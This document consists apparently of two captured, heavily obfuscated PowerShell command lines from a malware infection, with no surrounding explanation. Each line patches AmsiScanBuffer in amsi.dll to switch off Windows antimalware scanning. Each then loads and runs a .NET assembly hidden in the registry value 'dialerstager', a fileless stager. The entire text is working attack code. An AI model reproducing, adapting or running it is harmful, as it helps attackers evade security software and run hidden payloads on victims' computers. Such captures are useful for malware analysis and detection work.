Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+'l'+''+[Char](101)+'ct'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+'l'+''+'e'+'',$False).DefineType('My'+[Char](68)+''+[Char](101)+'l'+'e'+'g'+[Char](97)+'teTy'+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+''+[Char](44)+'P'+'u'+'b'+'l'+''+[Char](105)+'c'+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+'ed'+[Char](44)+''+[Char](65)+'n'+'s'+''+'i'+'Cl'+'a'+'s'+'s'+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+'o'+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$zkBlsUcCTGg.DefineConstructor('R'+[Char](84)+'Sp'+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+','+[Char](72)+''+'i'+'de'+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$GMdcfETqxhVXhb).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+'t'+'i'+[Char](109)+''+'e'+''+[Char](44)+'Ma'+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');$zkBlsUcCTGg.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'wSl'+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+''+'r'+'t'+'u'+''+'a'+''+[Char](108)+'',$JYumfywPrD,$GMdcfETqxhVXhb).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+','+'M'+[Char](97)+''+'n'+''+'a'+'ge'+[Char](100)+'');Write-Output $zkBlsUcCTGg.CreateType();}$oNJMwnzQODknT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+'st'+[Char](101)+''+[Char](109)+'.'+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+'r'+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+'n'+''+'3'+''+[Char](50)+''+[Char](46)+''+'U'+'n'+'s'+''+[Char](97)+'fe'+[Char](78)+''+[Char](97)+''+[Char](116)+'iv'+[Char](101)+''+[Char](77)+''+[Char](101)+'t'+'h'+''+[Char](111)+''+[Char](100)+''+'s'+'');$sIvRgCJXJXCmsJ=$oNJMwnzQODknT.GetMethod(''+'G'+''+'e'+''+'t'+''+[Char](80)+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+'d'+[Char](100)+'r'+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MLbVmAASRbIlzRJYxVp=IYiKntmHJqyr @([String])([IntPtr]);$GIeaxjpNzAhGvlOqXBzHTe=IYiKntmHJqyr @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XBzYuQJMIbf=$oNJMwnzQODknT.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$wiiLuyMIgmNAEY=$sIvRgCJXJXCmsJ.Invoke($Null,@([Object]$XBzYuQJMIbf,[Object](''+[Char](76)+''+[Char](111)+''+'a'+'d'+[Char](76)+''+[Char](105)+''+'b'+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+'A'+'')));$IxwwnPYgJWzhmGQdp=$sIvRgCJXJXCmsJ.Invoke($Null,@([Object]$XBzYuQJMIbf,[Object]('V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+'rot'+[Char](101)+'c'+'t'+'')));$mxyQDDp=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wiiLuyMIgmNAEY,$MLbVmAASRbIlzRJYxVp).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$YEkTGdxZYLSBiDeIf=$sIvRgCJXJXCmsJ.Invoke($Null,@([Object]$mxyQDDp,[Object](''+'A'+'ms'+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+'uff'+'e'+''+'r'+'')));$gCeGeVeNnH=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IxwwnPYgJWzhmGQdp,$GIeaxjpNzAhGvlOqXBzHTe).Invoke($YEkTGdxZYLSBiDeIf,[uint32]8,4,[ref]$gCeGeVeNnH);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YEkTGdxZYLSBiDeIf,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IxwwnPYgJWzhmGQdp,$GIeaxjpNzAhGvlOqXBzHTe).Invoke($YEkTGdxZYLSBiDeIf,[uint32]8,0x20,[ref]$gCeGeVeNnH);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+'W'+'A'+'R'+''+'E'+'').GetValue('di'+[Char](97)+''+[Char](108)+'e'+'r'+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:HMsnjFjkJPnN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TZDBwXrTrclpRP,[Parameter(Position=1)][Type]$bmCHSAbAQq)$JoGvGgFwMiP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+'f'+''+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+'e'+'g'+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'Me'+[Char](109)+''+'o'+''+'r'+'y'+'M'+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+'l'+[Char](101)+'g'+[Char](97)+''+'t'+''+'e'+'T'+[Char](121)+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+''+'e'+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+'iC'+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$JoGvGgFwMiP.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+'p'+'e'+'c'+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+'a'+[Char](109)+''+'e'+''+[Char](44)+'H'+'i'+''+[Char](100)+''+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+','+''+[Char](80)+''+'u'+'b'+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$TZDBwXrTrclpRP).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+'a'+[Char](103)+''+[Char](101)+''+'d'+'');$JoGvGgFwMiP.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+[Char](107)+''+'e'+'','Pub'+'l'+'i'+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+'e'+'w'+''+[Char](83)+''+[Char](108)+'ot,'+'V'+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'',$bmCHSAbAQq,$TZDBwXrTrclpRP).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+'e'+''+','+''+[Char](77)+''+[Char](97)+'na'+[Char](103)+''+'e'+''+'d'+'');Write-Output $JoGvGgFwMiP.CreateType();}$dxTtEneEGneKQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+'i'+''+'c'+'r'+[Char](111)+''+'s'+''+[Char](111)+'f'+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+''+'n'+''+'3'+'2.'+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+'eNa'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+'ho'+[Char](100)+''+[Char](115)+'');$NZcnIwFeKbOqWd=$dxTtEneEGneKQ.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](80)+''+[Char](114)+'o'+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+'a'+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$yFUUJqHtHetaaYIdtVn=HMsnjFjkJPnN @([String])([IntPtr]);$rcpTzAaTkFLRAdbUwkBkXc=HMsnjFjkJPnN @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$bPUbhiJOAeW=$dxTtEneEGneKQ.GetMethod(''+'G'+''+'e'+'tMo'+'d'+''+'u'+''+[Char](108)+'e'+'H'+''+'a'+''+'n'+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'n'+'e'+''+'l'+'3'+[Char](50)+'.'+[Char](100)+''+[Char](108)+'l')));$zlpoURCNfghEzA=$NZcnIwFeKbOqWd.Invoke($Null,@([Object]$bPUbhiJOAeW,[Object]('L'+[Char](111)+''+[Char](97)+'d'+'L'+''+[Char](105)+'b'+[Char](114)+'a'+'r'+''+'y'+''+'A'+'')));$cnhTUggRDdqszAcJI=$NZcnIwFeKbOqWd.Invoke($Null,@([Object]$bPUbhiJOAeW,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+'r'+'o'+'t'+''+[Char](101)+''+[Char](99)+''+'t'+'')));$UVMPWqr=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zlpoURCNfghEzA,$yFUUJqHtHetaaYIdtVn).Invoke(''+'a'+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'');$tmvHGRsEBkqGTIYtP=$NZcnIwFeKbOqWd.Invoke($Null,@([Object]$UVMPWqr,[Object](''+[Char](65)+''+[Char](109)+'si'+[Char](83)+'c'+'a'+''+[Char](110)+''+[Char](66)+'u'+'f'+'fer')));$Gkyeayzfms=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cnhTUggRDdqszAcJI,$rcpTzAaTkFLRAdbUwkBkXc).Invoke($tmvHGRsEBkqGTIYtP,[uint32]8,4,[ref]$Gkyeayzfms);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$tmvHGRsEBkqGTIYtP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cnhTUggRDdqszAcJI,$rcpTzAaTkFLRAdbUwkBkXc).Invoke($tmvHGRsEBkqGTIYtP,[uint32]8,0x20,[ref]$Gkyeayzfms);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+'T'+'WAR'+[Char](69)+'').GetValue(''+'d'+''+[Char](105)+''+'a'+''+'l'+'er'+'s'+''+'t'+''+'a'+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"